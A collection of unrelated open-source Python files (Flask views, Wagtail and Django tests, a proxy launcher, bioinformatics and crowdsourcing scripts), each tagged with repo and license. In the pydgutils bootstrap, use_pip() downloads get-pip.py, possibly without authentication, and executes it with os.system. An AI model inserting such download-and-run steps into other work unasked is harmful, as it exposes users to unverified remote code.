                            "%s should be allowed" % good_url)
            self.confirm_logged_out()
|
disqus/django-old
|
django/contrib/auth/tests/views.py
|
Python
|
bsd-3-clause
| 18,537
|
# -*- coding: utf-8 -*-
"""
Defines views.
"""
import calendar
from flask import redirect, abort
from flask.ext.mako import render_template
from mako.exceptions import TopLevelLookupException
from presence_analyzer.main import app
from presence_analyzer.utils import (
jsonify,
get_data,
mean,
group_by_weekday,
group_start_end_by_weekday,
get_xml_data
)
import logging
log = logging.getLogger(__name__) # pylint: disable=C0103
@app.route('/')
def mainpage():
    """
    Redirects to front page.
    """
    # The weekday presence chart is the application's default view.
    return redirect("presence_weekday.html")
@app.route('/<site>')
def presence_page(site=None):
    """
    Returns rendered site.

    Unknown template names yield a 404 rather than a server error.
    """
    try:
        rendered = render_template(site)
    except TopLevelLookupException:
        # No such template: treat the URL as a missing page.
        abort(404)
    return rendered
@app.route('/api/v1/users', methods=['GET'])
@jsonify
def users_view():
    """
    Users listing for dropdown.

    Returns a list of {'user_id': ..., 'name': 'User <id>'} dicts, one per
    user present in the data.
    """
    data = get_data()
    # Iterate the dict directly instead of data.keys(), and let format()
    # stringify the id (the explicit str() was redundant).
    return [{'user_id': i, 'name': 'User {0}'.format(i)} for i in data]
@app.route('/api/v2/users')
@jsonify
def users_xml_view():
    """
    Users with name, avatar listing.
    """
    # v2 serves the richer user records parsed from the XML source.
    return get_xml_data()
@app.route('/api/v1/mean_time_weekday/<int:user_id>', methods=['GET'])
@jsonify
def mean_time_weekday_view(user_id):
    """
    Returns mean presence time of given user grouped by weekday.
    """
    data = get_data()
    if user_id not in data:
        log.debug('User %s not found!', user_id)
        # Unknown user: an empty list keeps the JSON response well-formed.
        return []
    weekdays = group_by_weekday(data[user_id])
    # One (weekday abbreviation, mean of intervals) pair per weekday.
    result = [(calendar.day_abbr[weekday], mean(intervals))
              for weekday, intervals in weekdays.items()]
    return result
@app.route('/api/v1/presence_weekday/<int:user_id>', methods=['GET'])
@jsonify
def presence_weekday_view(user_id):
    """
    Returns total presence time of given user grouped by weekday.
    """
    data = get_data()
    if user_id not in data:
        log.debug('User %s not found!', user_id)
        # Unknown user: an empty list keeps the JSON response well-formed.
        return []
    weekdays = group_by_weekday(data[user_id])
    # One (weekday abbreviation, total seconds) pair per weekday.
    result = [(calendar.day_abbr[weekday], sum(intervals))
              for weekday, intervals in weekdays.items()]
    # Header row consumed by the charting frontend.
    result.insert(0, ('Weekday', 'Presence (s)'))
    return result
@app.route('/api/v1/presence_start_end/<int:user_id>', methods=['GET'])
@jsonify
def presence_start_end_view(user_id):
    """
    Returns start, end time when user is most often present grouped by weekday.
    """
    data = get_data()
    if user_id not in data:
        log.debug('User %s not found!', user_id)
        # Unknown user: an empty list keeps the JSON response well-formed.
        return []
    weekdays = group_start_end_by_weekday(data[user_id])
    # One (weekday abbreviation, mean start, mean end) triple per weekday.
    result = [
        (calendar.day_abbr[weekday],
         mean(start_end_dict['start']),
         mean(start_end_dict['end']))
        for weekday, start_end_dict in weekdays.items()
    ]
    return result
|
stxnext-kindergarten/presence-analyzer-mjelonek
|
src/presence_analyzer/views.py
|
Python
|
mit
| 2,812
|
#! /usr/bin/env python
import os
import sys
import subprocess
def runTests():
    """Run the StgFEM normal-resolution integration test commands, append a
    pass/fail summary to ../../../summary.dat, and exit with a non-zero
    status if any command failed.  (Python 2 script.)"""
    commands = ['./analyticTest.pl CosineHillRotateBC.xml -optionsFile np-1.dat', \
                './analyticTest.pl CosineHillRotateBC.xml -optionsFile np-2.dat', \
                './analyticTest.pl CosineHillRotateBC.xml -optionsFile np-4.dat', \
                './analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-1.dat', \
                './analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-2.dat', \
                './analyticTest.pl CosineHillRotateBC-DualMesh.xml -optionsFile np-4.dat', \
                './analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-1.dat', \
                './analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-2.dat', \
                './analyticTest.pl HomogeneousNaturalBCs.xml -optionsFile np-4.dat', \
                './analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-1.dat', \
                './analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-2.dat', \
                './analyticTest.pl HomogeneousNaturalBCs-DualMesh.xml -optionsFile np-4.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-1.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-2.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile ss-0.5-np-4.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile np-1.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile np-2.dat', \
                './analyticTest.pl SteadyState1D-x.xml -optionsFile np-4.dat', \
                './analyticTest.pl SteadyState1D-y.xml -optionsFile np-1.dat', \
                './analyticTest.pl SteadyState1D-y.xml -optionsFile np-2.dat', \
                './analyticTest.pl SteadyState1D-y.xml -optionsFile np-4.dat', \
                './analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-1.dat', \
                './analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-2.dat', \
                './analyticTest.pl AnalyticSimpleShear.xml -optionsFile np-4.dat', \
                './analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-1.dat', \
                './analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-2.dat', \
                './analyticTest.pl AnalyticSinusoid.xml -optionsFile as-np-4.dat', \
                './analyticTest.pl TempDiffusion.xml -optionsFile np-1.dat', \
                './analyticTest.pl TempDiffusion.xml -optionsFile np-2.dat', \
                './analyticTest.pl TempDiffusion.xml -optionsFile np-4.dat', \
                './analyticTest.pl TempDiffusion.xml -optionsFile np-8.dat', \
                './checkpointTest.pl Multigrid.xml']

    failed_commands = []
    passed = 0
    failed = 0
    for command in commands:
        try:
            # Exit status 0 means the test script reported success.
            retcode = subprocess.call( command, shell=True )
            if retcode == 0:
                passed += 1
            else:
                failed += 1
                failed_commands.append( command )
        except OSError, e:
            print >>sys.stderr, "Execution Failed:", e

    # Append to the shared summary file, creating it if necessary.
    filename = "../../../summary.dat"
    if os.path.exists( filename ):
        FILE = open( filename, "a" )
    else:
        FILE = open( filename, "w" )
    message = ''
    message += "--------------------------------------------------------\n" + \
               "[SYS] StgFEM Normal-Res Integration Tests:\n" + \
               "[SYS] Total Passes: (" + str(passed) + "/" + str(len( commands )) + ")\n"
    if( len(failed_commands) > 0 ):
        message += "[SYS] Failed Commands:\n"
        for command in failed_commands:
            message += "[SYS]     " + command + "\n"
    message += "--------------------------------------------------------\n"
    FILE.write( message )
    print message
    FILE.close()
    # Propagate failure to the caller via the process exit code.
    if failed > 0:
        sys.exit(1)
    else:
        sys.exit(0)

runTests()
|
geodynamics/gale
|
StgFEM/SysTest/RegressionTests/testAll.py
|
Python
|
gpl-2.0
| 4,003
|
from unittest import mock
from django.contrib.auth.models import Permission
from django.test import TestCase
from django.urls import reverse
from wagtail.core.models import Page
from wagtail.core.signals import page_unpublished
from wagtail.tests.testapp.models import SimplePage
from wagtail.tests.utils import WagtailTestUtils
class TestPageUnpublish(TestCase, WagtailTestUtils):
    """Tests for the admin unpublish view on a page without children."""

    def setUp(self):
        self.user = self.login()

        # Create a page to unpublish
        self.root_page = Page.objects.get(id=2)
        self.page = SimplePage(
            title="Hello world!",
            slug='hello-world',
            content="hello",
            live=True,
        )
        self.root_page.add_child(instance=self.page)

    def test_unpublish_view(self):
        """
        This tests that the unpublish view responds with an unpublish confirm page
        """
        # Get unpublish page
        response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))

        # Check that the user received an unpublish confirm page
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')

    def test_unpublish_view_invalid_page_id(self):
        """
        This tests that the unpublish view returns an error if the page id is invalid
        """
        # Get unpublish page
        response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(12345, )))

        # Check that the user received a 404 response
        self.assertEqual(response.status_code, 404)

    def test_unpublish_view_bad_permissions(self):
        """
        This tests that the unpublish view doesn't allow users without unpublish permissions
        """
        # Remove privileges from user
        self.user.is_superuser = False
        # Keep admin access so the request reaches the permission check itself.
        self.user.user_permissions.add(
            Permission.objects.get(content_type__app_label='wagtailadmin', codename='access_admin')
        )
        self.user.save()

        # Get unpublish page
        response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))

        # Check that the user received a 403 response
        self.assertEqual(response.status_code, 403)

    def test_unpublish_view_post(self):
        """
        This posts to the unpublish view and checks that the page was unpublished
        """
        # Connect a mock signal handler to page_unpublished signal
        mock_handler = mock.MagicMock()
        page_unpublished.connect(mock_handler)

        # Post to the unpublish page
        response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))

        # Should be redirected to explorer page
        self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))

        # Check that the page was unpublished
        self.assertFalse(SimplePage.objects.get(id=self.page.id).live)

        # Check that the page_unpublished signal was fired
        self.assertEqual(mock_handler.call_count, 1)
        mock_call = mock_handler.mock_calls[0][2]
        self.assertEqual(mock_call['sender'], self.page.specific_class)
        self.assertEqual(mock_call['instance'], self.page)
        self.assertIsInstance(mock_call['instance'], self.page.specific_class)

    def test_unpublish_descendants_view(self):
        """
        This tests that the unpublish view responds with an unpublish confirm page that does not contain the form field 'include_descendants'
        """
        # Get unpublish page
        response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.page.id, )))

        # Check that the user received an unpublish confirm page
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')
        # Check the form does not contain the checkbox field include_descendants
        self.assertNotContains(response, '<input id="id_include_descendants" name="include_descendants" type="checkbox">')
class TestPageUnpublishIncludingDescendants(TestCase, WagtailTestUtils):
    """Tests for the unpublish view's include_descendants behaviour."""

    def setUp(self):
        self.user = self.login()
        # Find root page
        self.root_page = Page.objects.get(id=2)

        # Create a page to unpublish
        self.test_page = self.root_page.add_child(instance=SimplePage(
            title="Hello world!",
            slug='hello-world',
            content="hello",
            live=True,
            has_unpublished_changes=False,
        ))

        # Create a couple of child pages
        self.test_child_page = self.test_page.add_child(instance=SimplePage(
            title="Child page",
            slug='child-page',
            content="hello",
            live=True,
            has_unpublished_changes=True,
        ))

        self.test_another_child_page = self.test_page.add_child(instance=SimplePage(
            title="Another Child page",
            slug='another-child-page',
            content="hello",
            live=True,
            has_unpublished_changes=True,
        ))

    def test_unpublish_descendants_view(self):
        """
        This tests that the unpublish view responds with an unpublish confirm page that contains the form field 'include_descendants'
        """
        # Get unpublish page
        response = self.client.get(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )))

        # Check that the user received an unpublish confirm page
        self.assertEqual(response.status_code, 200)
        self.assertTemplateUsed(response, 'wagtailadmin/pages/confirm_unpublish.html')
        # Check the form contains the checkbox field include_descendants
        self.assertContains(response, '<input id="id_include_descendants" name="include_descendants" type="checkbox">')

    def test_unpublish_include_children_view_post(self):
        """
        This posts to the unpublish view and checks that the page and its descendants were unpublished
        """
        # Post to the unpublish page
        response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )), {'include_descendants': 'on'})

        # Should be redirected to explorer page
        self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))

        # Check that the page was unpublished
        self.assertFalse(SimplePage.objects.get(id=self.test_page.id).live)

        # Check that the descendant pages were unpublished as well
        self.assertFalse(SimplePage.objects.get(id=self.test_child_page.id).live)
        self.assertFalse(SimplePage.objects.get(id=self.test_another_child_page.id).live)

    def test_unpublish_not_include_children_view_post(self):
        """
        This posts to the unpublish view and checks that the page was unpublished but its descendants were not
        """
        # Post to the unpublish page
        response = self.client.post(reverse('wagtailadmin_pages:unpublish', args=(self.test_page.id, )), {})

        # Should be redirected to explorer page
        self.assertRedirects(response, reverse('wagtailadmin_explore', args=(self.root_page.id, )))

        # Check that the page was unpublished
        self.assertFalse(SimplePage.objects.get(id=self.test_page.id).live)

        # Check that the descendant pages were not unpublished
        self.assertTrue(SimplePage.objects.get(id=self.test_child_page.id).live)
        self.assertTrue(SimplePage.objects.get(id=self.test_another_child_page.id).live)
|
timorieber/wagtail
|
wagtail/admin/tests/pages/test_unpublish_page.py
|
Python
|
bsd-3-clause
| 7,589
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from .base import BaseElasticsearchQuery
class AllElasticsearchQuery(BaseElasticsearchQuery):
    """
    This is an Elasticsearch query class that is meant to query all of the document types in
    a given index.
    """

    # Class Members

    # Instantiation

    # Static Methods

    # Class Methods

    @classmethod
    def get_queried_class(cls):
        # No single model class backs this query, since it spans all doc types.
        return None

    # Public Methods

    # Protected Methods

    def _validate_queryable_field(self, field):
        # Accept any field: with every doc type in scope there is no single
        # schema to validate against.
        pass

    # Private Methods

    # Properties

    @property
    def doc_type(self):
        # None presumably tells the base query not to restrict by document
        # type — TODO confirm against BaseElasticsearchQuery.
        return None

    @property
    def queryable_fields(self):
        # No explicit field whitelist (see _validate_queryable_field above).
        return []

    # Representation and Comparison
|
lavalamp-/ws-backend-community
|
wselasticsearch/query/all.py
|
Python
|
gpl-3.0
| 754
|
'''
The MIT License (MIT)
Copyright (c) 2016-2018, Hong-She Liang <starofrainnight@gmail.com>.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
'''
Bootstrap pydgutils setup environment
@author Hong-She Liang <starofrainnight@gmail.com>
'''
import os
import os.path
import platform
import subprocess
import sys
def _clean_check(cmd, target):
"""
Run the command to download target. If the command fails, clean up before
re-raising the error.
"""
try:
subprocess.check_call(cmd)
except subprocess.CalledProcessError:
if os.access(target, os.F_OK):
os.unlink(target)
raise
def download_file_powershell(url, target):
    """
    Download the file at url to target using Powershell (which will validate
    trust). Raise an exception if the command cannot complete.
    """
    target = os.path.abspath(target)
    # Build the one-line PS script; %r quoting keeps the values PS-safe enough
    ps_script = (
        "(new-object System.Net.WebClient).DownloadFile(%(url)r, %(target)r)"
        % vars()
    )
    _clean_check(['powershell', '-Command', ps_script], target)
def has_powershell():
    """
    Return True when a working ``powershell`` executable is available.

    Only meaningful on Windows; every other platform short-circuits to False.
    """
    if platform.system() != 'Windows':
        return False
    cmd = ['powershell', '-Command', 'echo test']
    # with-block replaces the manual try/finally close of the devnull handle
    with open(os.path.devnull, 'wb') as devnull:
        try:
            # CalledProcessError: powershell ran but exited non-zero;
            # OSError: the executable is missing entirely. The previous bare
            # ``except:`` also swallowed KeyboardInterrupt/SystemExit.
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except (subprocess.CalledProcessError, OSError):
            return False
    return True
# Advertise the availability probe so get_best_downloader() can pick this one.
download_file_powershell.viable = has_powershell
def download_file_curl(url, target):
    """Download *url* to *target* with curl, raising on failure."""
    _clean_check(['curl', url, '--silent', '--output', target], target)
def has_curl():
    """Return True when a runnable ``curl`` binary is on the PATH."""
    cmd = ['curl', '--version']
    # with-block replaces the manual try/finally close of the devnull handle
    with open(os.path.devnull, 'wb') as devnull:
        try:
            # Narrowed from a bare ``except:`` which also trapped
            # KeyboardInterrupt/SystemExit.
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except (subprocess.CalledProcessError, OSError):
            return False
    return True
# Advertise the availability probe so get_best_downloader() can pick this one.
download_file_curl.viable = has_curl
def download_file_wget(url, target):
    """Download *url* to *target* with wget, raising on failure."""
    _clean_check(['wget', url, '--quiet', '--output-document', target], target)
def has_wget():
    """Return True when a runnable ``wget`` binary is on the PATH."""
    cmd = ['wget', '--version']
    # with-block replaces the manual try/finally close of the devnull handle
    with open(os.path.devnull, 'wb') as devnull:
        try:
            # Narrowed from a bare ``except:`` which also trapped
            # KeyboardInterrupt/SystemExit.
            subprocess.check_call(cmd, stdout=devnull, stderr=devnull)
        except (subprocess.CalledProcessError, OSError):
            return False
    return True
# Advertise the availability probe so get_best_downloader() can pick this one.
download_file_wget.viable = has_wget
def download_file_insecure(url, target):
    """
    Use Python to download the file, even though it cannot authenticate the
    connection.
    """
    # Python 3 / Python 2 urlopen import
    try:
        from urllib.request import urlopen
    except ImportError:
        from urllib2 import urlopen
    src = None
    dst = None
    try:
        src = urlopen(url)
        # Read/write all in one block, so we don't create a corrupt file
        # if the download is interrupted.
        payload = src.read()
        dst = open(target, "wb")
        dst.write(payload)
    finally:
        for handle in (src, dst):
            if handle:
                handle.close()
# Pure-Python fallback needs no external tool, so it is always "viable".
download_file_insecure.viable = lambda: True
def get_best_downloader():
    """
    Return the first viable downloader, preferring trust-validating tools
    (powershell, curl, wget) over the insecure pure-Python fallback.
    Returns None when nothing is viable (should not happen: the fallback
    is always viable).
    """
    candidates = (
        download_file_powershell,
        download_file_curl,
        download_file_wget,
        download_file_insecure,
    )
    return next((dl for dl in candidates if dl.viable()), None)
def download(url):
    """Fetch *url* into the current directory, keeping its basename."""
    get_best_downloader()(url, os.path.basename(url))
def use_pip():
    """
    Ensure ``pip`` is importable, bootstrapping it from get-pip.py when
    absent (get-pip.py also installs setuptools and wheel).
    """
    try:
        import pip  # noqa: F401
    except ImportError:
        # Narrowed from a bare ``except:``: only a missing module should
        # trigger the bootstrap download. The redundant local ``import os``
        # and ``import sys`` were dropped -- both are module-level imports.
        url = "https://bootstrap.pypa.io/get-pip.py"
        filename = os.path.basename(url)
        download(url)
        os.system("%s %s" % (sys.executable, filename))
def use_pydgutils():
    """
    Ensure ``pydgutils`` is importable, installing it via pip when absent.
    """
    try:
        import pydgutils  # noqa: F401
    except ImportError:
        # Narrowed from bare ``except:`` clauses (which also swallowed
        # KeyboardInterrupt/SystemExit).
        use_pip()
        try:
            from pip import main as pipmain
        except ImportError:
            # pip >= 10 moved main() into pip._internal.
            from pip._internal import main as pipmain
        pipmain(["install", "pydgutils"])
|
starofrainnight/rabird.auto
|
pydgutils_bootstrap.py
|
Python
|
mit
| 4,995
|
import numpy as np
import os
import commands
import itertools
import multiprocessing as mp
import scipy.sparse
import math
import sys
import getopt
# --- Command-line parsing (Python 2 script) ---------------------------------
# Options: -i/--idir input read dir, -o/--odir output dir,
# -r/--sampling-rate fraction of reads to keep, -k/--sampling-key seed for
# seqtk, -n/--njobs worker-process count.
try:
    opts, args = getopt.getopt(sys.argv[1:],"i:o:r:k:n:",["idir=","odir=","sampling-rate=","sampling-key=","njobs="])
except getopt.GetoptError:
    print ("getopterrror")
    print ('usage is : \n python sample_reads.py -i input_read_dir -o output-read-dir -r sampling-rate -k sampling-key [-n number-of-processes]')
    sys.exit(1)
# Defaults; a zero/empty value below counts as "not provided".
key=0
read_dir=''
out_dir=''
sampling_rate=0
num_proc=1
print opts
for opt,arg in opts:
    if opt in ("-i", "--idir"):
        read_dir=arg
    elif opt in ("-o", "--odir"):
        out_dir=arg
    elif opt in ("-n","--njobs"):
        num_proc=int(arg)
    elif opt in ("-r","--sampling-rate"):
        sampling_rate=float(arg)
    elif opt in ("-k","--sampling-key"):
        key=int(arg)
# NOTE(review): these falsy checks also reject legitimate values such as
# ``-k 0`` or ``-r 0`` -- presumably intended, but confirm before reuse.
if (not read_dir) or (not out_dir) or (not sampling_rate) or (not key):
    print ('usage is : \n python sample_reads.py -i input_read_dir -o output-read-dir -r sampling-rate -k sampling-key [-n number-of-processes]')
    sys.exit(1)
def subsample_reads(fltuple):
    # Pool.map worker: unpack (filename, rate, in_dir, out_dir, seed).
    # A single tuple argument is used because Pool.map passes one positional.
    flname=fltuple[0]
    subsampling_rate=fltuple[1]
    read_dir=fltuple[2]
    out_dir=fltuple[3]
    key=fltuple[4]
    # Count reads in the gzipped FASTQ: 4 lines per read.
    cmd='zcat '+read_dir+flname+' | wc -l'
    out=commands.getstatusoutput(cmd)
    num_reads=int(out[1])/4
    num_reads_to_sample=int(math.ceil(num_reads*subsampling_rate))
    print num_reads_to_sample
    # seqtk sample -s<seed>: the shared seed keeps sampling reproducible
    # and consistent across paired files.
    cmd2='seqtk sample -s'+str(key)+' '+read_dir+flname+' '+ str(num_reads_to_sample) + ' | gzip > '+out_dir+flname
    print cmd2
    os.system(cmd2)
# In[14]:
#print repr(sys.argv[1])
# Fan the per-file subsampling jobs out over a process pool; every file gets
# the same rate/dirs/seed via itertools.product.
os.system('mkdir -p '+out_dir)
flnames=sorted([x for x in os.listdir(read_dir) if x.endswith('.fastq.gz')])
fltuple=itertools.product(flnames,[sampling_rate],[read_dir],[out_dir],[key])
pool=mp.Pool(processes=num_proc)
pool.map(subsample_reads,fltuple)
# In[15]:
|
govinda-kamath/clustering_on_transcript_compatibility_counts
|
Zeisel_pipeline/sample_reads.py
|
Python
|
mit
| 1,955
|
import json
import pytz
from datetime import datetime
from django.conf import settings
from basecrowd.interface import CrowdInterface
from connection import create_hit, disable_hit, reject_assignment, bonus_worker, expire_hit
from connection import AMT_NO_ASSIGNMENT_ID
from models import Request
class AMTCrowdInterface(CrowdInterface):
    """Crowd interface backed by Amazon Mechanical Turk (via boto)."""
    @staticmethod
    def validate_configuration(configuration):
        # Validate the configuration specific to amt: only requires that a
        # 'sandbox' key is present in the context.
        try:
            CrowdInterface.require_context(
                configuration,
                ['sandbox'],
                ValueError())
        except ValueError:
            return False
        return True
    @staticmethod
    def create_task(configuration, content):
        # Use the boto API to create an AMT HIT; returns whatever create_hit
        # returns (the task identifier).
        additional_options = {'num_responses': configuration['num_assignments']}
        additional_options.update(configuration['amt'])
        return create_hit(additional_options)
    @staticmethod
    def pay_worker_bonus(worker_object, assignment_object, bonus_amount, reason):
        # Thin delegation to the AMT connection layer.
        bonus_worker(worker_object, assignment_object, bonus_amount, reason)
    @staticmethod
    def reject_task(assignment_object, worker_object, reason):
        # worker_object is unused here; AMT rejects by assignment only.
        reject_assignment(assignment_object, reason)
    @staticmethod
    def expire_tasks(task_objects):
        # Expire (stop accepting new assignments for) each HIT.
        for task in task_objects:
            expire_hit(task)
    @staticmethod
    def delete_tasks(task_objects):
        # Use the boto API to delete the HITs
        for task in task_objects:
            disable_hit(task)
    @staticmethod
    def get_assignment_context(request):
        """Build the assignment context from the AMT callback request."""
        request_data = request.GET if request.method == 'GET' else request.POST
        # parse information from AMT in the URL
        context = {
            'task_id': request_data.get('hitId'),
            'worker_id': request_data.get('workerId'),
            'submit_url': request_data.get('turkSubmitTo'),
        }
        # check for requests for a preview of the task: AMT sends a sentinel
        # assignment id while the worker has not yet accepted the HIT.
        assignment_id = request_data.get('assignmentId')
        if assignment_id == AMT_NO_ASSIGNMENT_ID:
            assignment_id = None
            is_accepted = False
        else:
            is_accepted = True
        context['assignment_id'] = assignment_id
        context['is_accepted'] = is_accepted
        # store the request if it has been accepted
        # NOTE(review): list concatenation of .items() is Python 2 only.
        if is_accepted:
            Request.objects.create(
                path=request.get_full_path(),
                post_json=json.dumps(dict(request.GET.items() + request.POST.items())),
                recv_time=pytz.utc.localize(datetime.now()))
        return context
    def get_frontend_submit_url(self, crowd_config):
        # Sandbox and production AMT use different postback endpoints.
        return (settings.POST_BACK_AMT_SANDBOX
                if crowd_config['sandbox'] else settings.POST_BACK_AMT)
# Module-level singleton registered under the 'amt' crowd name.
AMT_INTERFACE = AMTCrowdInterface('amt')
|
amplab/ampcrowd
|
ampcrowd/amt/interface.py
|
Python
|
apache-2.0
| 2,871
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
import atexit
import config
import logging
from web.wsgi import application as web_application
from service import getService
from shadowsocks import eventloop, daemon
# Shared event loop; created in __main__ below.
main_loop = None
# Runtime options; parse_opts() may override these from the command line.
opts = {
    # 'daemon' : 'restart',
    'pid-file': '/var/run/ssland.pid',
    'log-file': '/var/log/ssland.log',
    'no-http': False,
}
def print_help():
    # Print CLI usage and return; the caller decides whether to exit.
    print('''usage: ssland [OPTION]
A multi-in-one proxy provider
Proxy options:
    -d start/stop/restart daemon mode
    -n , --no-http disable built-in http server
''')
def parse_opts():
    """
    Parse command-line options into the module-level ``opts`` dict.
    Prints help and exits for -h/--help.
    """
    import getopt
    # NOTE(review): 's' is accepted here but never handled below -- kept so
    # existing invocations passing -s do not start failing.
    shortopts = "hnd:s"
    # Fix: 'daemon=' (with '=') so --daemon requires a value, matching 'd:';
    # previously getopt treated --daemon as flag-like and the value was lost.
    longopts = ['help', 'no-http', 'daemon=']
    optlist, _ = getopt.getopt(sys.argv[1:], shortopts, longopts)
    for key, value in optlist:
        if key == '-h' or key == '--help':
            print_help()
            sys.exit(0)
        elif key == '-n' or key == '--no-http':
            opts['no-http'] = True
        elif key == '-d' or key == '--daemon':
            opts['daemon'] = value
def init_all_service():
    # Build {service_name: [account_config, ...]} from enabled accounts of
    # active users, then init/start every configured service on the shared
    # event loop. (Python 2: uses dict.iteritems.)
    from web.models import ProxyAccount
    accounts = {}    # "service": [account1, account2]
    for ac in ProxyAccount.objects.filter(enabled=True, user__is_active=True).all():
        name = ac.service
        if not name in accounts: accounts[name] = []
        accounts[name].append(ac.config)
    # Services with no matching accounts still get started, with an empty list.
    for name, service_config in config.MODULES.iteritems():
        if not name in accounts: accounts[name] = []
        service = getService(name)
        service.init(service_config)
        service.start(accounts[name], event_loop=main_loop)
def kill_all_service():
    """Stop every service listed in the configuration."""
    for service_name in config.MODULES:
        getService(service_name).stop()
if __name__ == "__main__":
    parse_opts()
    # Daemonize (start/stop/restart) according to opts before anything else.
    daemon.daemon_exec(opts)
    if config.DEBUG:
        logging.basicConfig(level=logging.DEBUG,
            format='[%(asctime)s] %(levelname)s: %(message)s',
            datefmt='%Y-%m-%d %H:%M:%S'
        )
    main_loop = eventloop.EventLoop()
    init_all_service()
    # Ensure services shut down cleanly on interpreter exit.
    atexit.register(kill_all_service)
    # WSGI App
    # this is slow. consider uWSGI or other backend
    if not opts['no-http']:
        logging.info('Starting HTTP Server on %d', config.HTTP_PORT)
        from core.httpserver import SlowHTTPServer
        server = SlowHTTPServer(wsgi_app=web_application, port=config.HTTP_PORT)
        server.add_to_loop(main_loop)
    # Quota supervisor
    from core.quota_supervisor import QuotaSupervisor
    quota_supervisor = QuotaSupervisor()
    quota_supervisor.add_to_loop(main_loop)
    # start the event loop
    main_loop.run()
|
laobubu/ssland
|
ssland.py
|
Python
|
mit
| 2,660
|
# Generated by Django 2.2.16 on 2021-03-10 12:10
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Adds party-snapshot fields to Membership: a nullable FK to the
    # PartyDescription plus denormalised text copies that survive later edits
    # to the party or its description.
    dependencies = [
        ("parties", "0012_add_party_docs"),
        ("popolo", "0035_attach_memberships_to_posts"),
    ]
    operations = [
        migrations.AddField(
            model_name="membership",
            name="party_description",
            field=models.ForeignKey(
                blank=True,
                null=True,
                on_delete=django.db.models.deletion.SET_NULL,
                to="parties.PartyDescription",
                help_text="The party description for this membership",
            ),
        ),
        migrations.AddField(
            model_name="membership",
            name="party_description_text",
            field=models.CharField(
                blank=True,
                max_length=800,
                help_text="The text of the party description at the time of this membership. This is useful if the associated party description subsequently changed",
            ),
        ),
        migrations.AddField(
            model_name="membership",
            name="party_name",
            field=models.CharField(
                blank=True,
                max_length=255,
                help_text="The name of the associated party at the time of this membership. This is useful if the associated party subsequently changed name",
            ),
        ),
    ]
|
DemocracyClub/yournextrepresentative
|
ynr/apps/popolo/migrations/0036_add_party_name_and_description.py
|
Python
|
agpl-3.0
| 1,497
|
# -*- Mode: Python; test-case-name: flumotion.test.test_ui_fgtk -*-
# vi:si:et:sw=4:sts=4:ts=4
#
# Flumotion - a streaming media server
# Copyright (C) 2004,2005,2006,2007 Fluendo, S.L. (www.fluendo.com).
# All rights reserved.
# This file may be distributed and/or modified under the terms of
# the GNU General Public License version 2 as published by
# the Free Software Foundation.
# This file is distributed without any warranty; without even the implied
# warranty of merchantability or fitness for a particular purpose.
# See "LICENSE.GPL" in the source distribution for more information.
# Licensees having purchased or holding a valid Flumotion Advanced
# Streaming Server license may use this file in accordance with the
# Flumotion Advanced Streaming Server Commercial License Agreement.
# See "LICENSE.Flumotion" in the source distribution for more information.
# Headers in this file shall remain intact.
"""
I am a collection of extended GTK widgets for use in Flumotion.
"""
import gobject
from kiwi.ui.widgets.checkbutton import ProxyCheckButton
from kiwi.ui.widgets.combo import ProxyComboBox
from kiwi.ui.widgets.entry import ProxyEntry
from kiwi.ui.widgets.radiobutton import ProxyRadioButton
from kiwi.ui.widgets.spinbutton import ProxySpinButton
__version__ = "$Rev$"
class FProxyComboBox(ProxyComboBox):
    def set_enum(self, enum_class, value_filter=()):
        """
        Set the given enum_class on the combobox.
        As a side effect, this makes the combobox an enum-based one.
        This also sets the combobox to the first enum value.
        """
        # Keep every member unless a non-empty filter excludes it.
